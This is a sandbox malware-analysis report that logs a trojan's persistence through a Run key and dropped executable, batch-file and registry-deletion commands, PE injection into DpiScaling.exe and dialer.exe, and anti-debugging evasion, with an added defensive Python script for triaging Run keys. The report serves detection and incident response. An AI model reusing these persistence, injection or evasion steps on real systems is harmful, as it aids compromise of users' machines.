              Source: C:\Users\user\Desktop\IQl00lxPjo.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' 'Jump to behavior
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' 'Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.batJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /fJump to behavior
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeProcess created: C:\Windows\SysWOW64\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeProcess created: C:\Windows\SysWOW64\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_00413958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,7_2_00413958
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Dsqbhgvfcbfuajfyoyryjvltgfkcgym[1]Jump to behavior
              Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@23/10@7/1
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_004163AD OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_004163AD
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0040D211 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,7_2_0040D211
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_01
              Source: C:\Windows\SysWOW64\DpiScaling.exeMutant created: \Sessions\1\BaseNamedObjects\Sept-AITAB5
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1280:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_01
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_00416C39 FindResourceA,LoadResource,LockResource,SizeofResource,7_2_00416C39
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_02894274 push eax; ret 0_3_028942B0
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_02894274 push eax; ret 0_3_028942B0
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_02894274 push eax; ret 0_3_028942B0
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_02894274 push eax; ret 0_3_028942B0
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_02894274 push eax; ret 0_3_028942B0
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_0230DA20 push 00406414h; ret 0_3_0230DA44
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_0230F324 push ecx; mov dword ptr [esp], eax0_3_0230F325
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_0230DBC6 push 004065BCh; ret 0_3_0230DBEC
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_0230DBC8 push 004065BCh; ret 0_3_0230DBEC
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_0230D9E6 push 004063DCh; ret 0_3_0230DA0C
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_0230D9E8 push 004063DCh; ret 0_3_0230DA0C
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_0230DED8 push 004068CCh; ret 0_3_0230DEFC
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_0230D708 push 00406121h; ret 0_3_0230D751
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_02894274 push eax; ret 0_3_028942B0
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_02894274 push eax; ret 0_3_028942B0
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_02894274 push eax; ret 0_3_028942B0
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_02894274 push eax; ret 0_3_028942B0
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_02894274 push eax; ret 0_3_028942B0
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_0230DA20 push 00406414h; ret 0_3_0230DA44
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_0230F324 push ecx; mov dword ptr [esp], eax0_3_0230F325
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_0230DBC6 push 004065BCh; ret 0_3_0230DBEC
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_0230DBC8 push 004065BCh; ret 0_3_0230DBEC
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_0230D9E6 push 004063DCh; ret 0_3_0230DA0C
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_0230D9E8 push 004063DCh; ret 0_3_0230DA0C
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_0230DED8 push 004068CCh; ret 0_3_0230DEFC
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_0230D708 push 00406121h; ret 0_3_0230D751
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_02894274 push eax; ret 0_3_028942B0
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_02894274 push eax; ret 0_3_028942B0
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_02894274 push eax; ret 0_3_028942B0
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_02894274 push eax; ret 0_3_028942B0
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeCode function: 0_3_02894274 push eax; ret 0_3_028942B0
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0040CD09
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeFile created: C:\Users\Public\Libraries\Dsqbhgvf.exeJump to dropped file
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_00405C8B ShellExecuteW,URLDownloadToFileW,7_2_00405C8B
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_004163AD OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_004163AD
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DsqbhgvfJump to behavior
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DsqbhgvfJump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0040CD09
              Source: C:\Users\user\Desktop\IQl00lxPjo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Dsqbhgvf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
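The persistence evidence above (a dropped executable under C:\Users\Public\Libraries, a matching HKCU Run value named Dsqbhgvf, batch files launched from C:\Users\Public, and `reg delete hkcu\Environment /v windir /f`) is what an incident responder would go and check on other hosts. The following is an added example, not Joe Sandbox or Remcos code: it parses the text that `reg query` prints for the HKCU Run key and HKCU\Environment and ranks what it finds. The report does not print the Run value's data, so the command lines, the extra `OneDrive` and `Updater` entries and the `windir` value in the sample output are constructed assumptions; on a live host the same parser takes the output of `subprocess.check_output(["reg", "query", key], text=True)`.

```python
"""Run-key and HKCU\\Environment triage from `reg query` output.

Added example for this report, not Joe Sandbox or Remcos code. The sample
`reg query` output at the bottom is constructed: the report names the Run
value Dsqbhgvf and the dropped file C:\\Users\\Public\\Libraries\\Dsqbhgvf.exe
but prints no value data, so every value line below is an assumption.
"""
import re
from typing import Dict, List, Tuple

RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
ENV_KEY = r"HKEY_CURRENT_USER\Environment"

# Every local user can write here; a per-user autostart from here is rarely legitimate.
PUBLIC_DIR = "c:\\users\\public\\"
# Writable by the current user; common for per-user installers, so only a weak signal.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# Hosts that run whatever script or DLL is handed to them on the command line.
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Machine-wide variables; a per-user copy overrides the system value for that user's processes.
MACHINE_ONLY_VARS = {"windir", "systemroot", "comspec"}

KEY_RE = re.compile(r"^(HKEY_[A-Z_]+\\.*)$")
VALUE_RE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_[A-Z_]+)\s+(?P<data>.*)$")


def parse_reg_query(text: str) -> Dict[str, Dict[str, Tuple[str, str]]]:
    """Map key path -> {value name: (type, data)} from `reg query` text."""
    keys: Dict[str, Dict[str, Tuple[str, str]]] = {}
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        key = KEY_RE.match(line)
        if key:
            current = key.group(1).rstrip()
            keys[current] = {}
            continue
        val = VALUE_RE.match(line)
        if val and current is not None:
            keys[current][val.group("name")] = (val.group("type"), val.group("data").rstrip())
    return keys


def executable_from_command(command: str) -> str:
    """First token of a Run-value command line, honouring a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def triage_run_values(values: Dict[str, Tuple[str, str]]) -> List[Tuple[str, str, List[str]]]:
    """Return (value name, severity, reasons) for every Run entry worth a look."""
    rank = {"low": 1, "medium": 2, "high": 3}
    out: List[Tuple[str, str, List[str]]] = []
    for name, (_type, data) in values.items():
        exe = executable_from_command(data).lower()
        hits: List[Tuple[str, str]] = []
        if PUBLIC_DIR in data.lower():
            hits.append(("high", "references C:\\Users\\Public, writable by every local user"))
        elif exe.startswith(USER_WRITABLE):
            hits.append(("low", "executable lives in a user-writable directory"))
        if exe.rsplit("\\", 1)[-1] in SCRIPT_HOSTS:
            hits.append(("medium", "autostart goes through a script/LOLBin host: " + exe))
        if hits:
            out.append((name, max((h[0] for h in hits), key=rank.get), [h[1] for h in hits]))
    return out


def triage_environment(values: Dict[str, Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Per-user definitions of machine-only variables, e.g. a windir override."""
    return [(name, data) for name, (_t, data) in values.items() if name.lower() in MACHINE_ONLY_VARS]


# Constructed `reg query` output (assumption; the report prints no value data).
SAMPLE_RUN_OUTPUT = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    Dsqbhgvf    REG_SZ    C:\Users\Public\Libraries\Dsqbhgvf.exe
    OneDrive    REG_SZ    "C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Updater     REG_SZ    cmd.exe /c C:\Users\Public\UKO.bat
"""
SAMPLE_ENV_OUTPUT = r"""
HKEY_CURRENT_USER\Environment
    Path    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps
    TEMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp
    windir  REG_SZ           C:\Users\Public\Libraries
"""


def run_sample() -> Dict[str, list]:
    run_values = parse_reg_query(SAMPLE_RUN_OUTPUT).get(RUN_KEY, {})
    env_values = parse_reg_query(SAMPLE_ENV_OUTPUT).get(ENV_KEY, {})
    return {"run": triage_run_values(run_values), "env": triage_environment(env_values)}


if __name__ == "__main__":
    result = run_sample()
    for name, sev, why in result["run"]:
        print(f"[{sev}] Run\\{name}: " + "; ".join(why))
    for name, data in result["env"]:
        print(f"[high] HKCU\\Environment\\{name} overrides a machine variable: {data}")
```

The `windir` check is there because the report shows the sample deleting exactly that per-user value once it is done with it; a responder who only looks at the Run key would miss that an override existed at all, so the check should run before any cleanup the malware performs is trusted.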

              Malware Analysis System Evasion:

               Delayed program exit found
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0040D0B5 Sleep,ExitProcess
               Source: C:\Windows\SysWOW64\DpiScaling.exe TID: 3080; Thread sleep time: -51000s >= -30000s
               Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed (reported 3 times)
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_004160DB OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_004061C3 FindFirstFileW,FindNextFileW
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00417754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_004077EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00446AF9 FindFirstFileExA
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00407C55 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_10597031 FindFirstFileW,FindNextFileW
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_1059B09B FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105A85C2 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_1059AE80 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0040697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW
               Source: DpiScaling.exe, 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0042F727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0040F15D GetProcessHeap,OpenProcess,OpenProcess,OpenProcess,GetCurrentProcessId,OpenProcess,GetCurrentProcessId,OpenProcess
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0043CB4E mov eax, dword ptr fs:[00000030h]
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105910CA mov eax, dword ptr fs:[00000030h] (reported 2 times)
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105CD9BC mov eax, dword ptr fs:[00000030h]
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Code function: 0_3_0230F0AC LdrInitializeThunk
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0042F8B9 SetUnhandledExceptionFilter
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0042F727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00436793 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0042FD2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105C7601 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_105C0B9A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

              HIPS / PFW / Operating System Protection Evasion:

               Writes to foreign memory regions
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 8D0000
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 960000
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 970000
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 980000
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 990000
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 8E0000
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 8F0000
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 900000
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 910000
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10590000
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 920000
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 930000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory written: C:\Windows\SysWOW64\dialer.exe base: 600000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory written: C:\Windows\SysWOW64\dialer.exe base: 690000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory written: C:\Windows\SysWOW64\dialer.exe base: 6A0000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory written: C:\Windows\SysWOW64\dialer.exe base: 6B0000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory written: C:\Windows\SysWOW64\dialer.exe base: 6C0000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory written: C:\Windows\SysWOW64\dialer.exe base: 610000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory written: C:\Windows\SysWOW64\dialer.exe base: 620000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory written: C:\Windows\SysWOW64\dialer.exe base: 630000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory written: C:\Windows\SysWOW64\dialer.exe base: 640000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory written: C:\Windows\SysWOW64\dialer.exe base: 10590000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory written: C:\Windows\SysWOW64\dialer.exe base: AF0000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory written: C:\Windows\SysWOW64\dialer.exe base: B80000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory written: C:\Windows\SysWOW64\dialer.exe base: B90000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory written: C:\Windows\SysWOW64\dialer.exe base: BA0000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory written: C:\Windows\SysWOW64\dialer.exe base: BB0000
               Allocates memory in foreign processes
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 10590000 protect: page execute and read and write
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 600000 protect: page execute and read and write
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 690000 protect: page execute and read and write
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 6A0000 protect: page execute and read and write
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 6B0000 protect: page execute and read and write
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 6C0000 protect: page execute and read and write
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 610000 protect: page execute and read and write
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 620000 protect: page execute and read and write
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 630000 protect: page execute and read and write
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory allocated: C:\Windows\SysWOW64\dialer.exe base: 640000 protect: page execute and read and write
               Injects a PE file into a foreign processes
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10590000 value starts with: 4D5A
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Memory written: C:\Windows\SysWOW64\dialer.exe base: 10590000 value starts with: 4D5A
               Contains functionality to inject code into remote processes
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0041412B CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle
               Creates a thread in another existing process (thread injection)
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 8D0000
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 990000
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 910000
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 930000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Thread created: C:\Windows\SysWOW64\dialer.exe EIP: 600000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Thread created: C:\Windows\SysWOW64\dialer.exe EIP: 6C0000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Thread created: C:\Windows\SysWOW64\dialer.exe EIP: 640000
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Thread created: C:\Windows\SysWOW64\dialer.exe EIP: AF0000
